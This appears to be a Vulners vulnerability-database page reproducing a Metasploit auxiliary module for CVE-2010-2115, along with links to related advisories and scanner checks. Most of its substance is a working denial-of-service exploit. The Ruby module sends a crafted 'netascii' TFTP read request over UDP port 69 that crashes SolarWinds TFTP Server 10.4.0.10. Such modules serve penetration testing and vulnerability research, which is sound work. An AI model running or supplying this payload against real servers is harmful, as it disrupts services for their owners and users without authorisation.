Lucene search
+L

SolarWinds TFTP Server 10.4.0.10 Denial of Service

🗓️ 04 Jun 2010 01:20:19Reported by NullthreatType 
metasploit
 metasploit
🔗 www.rapid7.com👁 17 Views

SolarWinds TFTP Server 10.4.0.10 Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-2115
21 May 201000:00
circl
CVE
CVE-2010-2115
28 May 201020:00
cve
Cvelist
CVE-2010-2115
28 May 201020:00
cvelist
NVD
CVE-2010-2115
28 May 201020:30
nvd
OpenVAS
SolarWinds TFTP Server 10.4.0.10 'Read' Request (Opcode 0x01) DoS Vulnerability - Active Check
25 May 201000:00
openvas
Packet Storm
SolarWinds TFTP Server 10.4.0.10 Denial of Service
31 Aug 202400:00
packetstorm
Prion
Cross site request forgery (csrf)
28 May 201020:30
prion
Tenable Nessus
SolarWinds TFTP Server < 10.4.0.13 DoS
25 Jun 201000:00
nessus
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SolarWinds TFTP Server 10.4.0.10 Denial of Service' ,
      'Description'    => %q{
          The SolarWinds TFTP server can be shut down by sending a 'netascii' read
        request with a specially crafted file name.
      },
      'Author'         => 'Nullthreat',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-2115' ],
          [ 'OSVDB', '64845' ],
          [ 'EDB', '12683' ]
        ],
      'DisclosureDate' => '2010-05-21'))

    register_options([
      Opt::RPORT(69)
    ])
  end

  def run
    connect_udp
    print_status("Sending Crash request...")
    udp_sock.put("\x00\x01\x01\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00")
    disconnect_udp
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation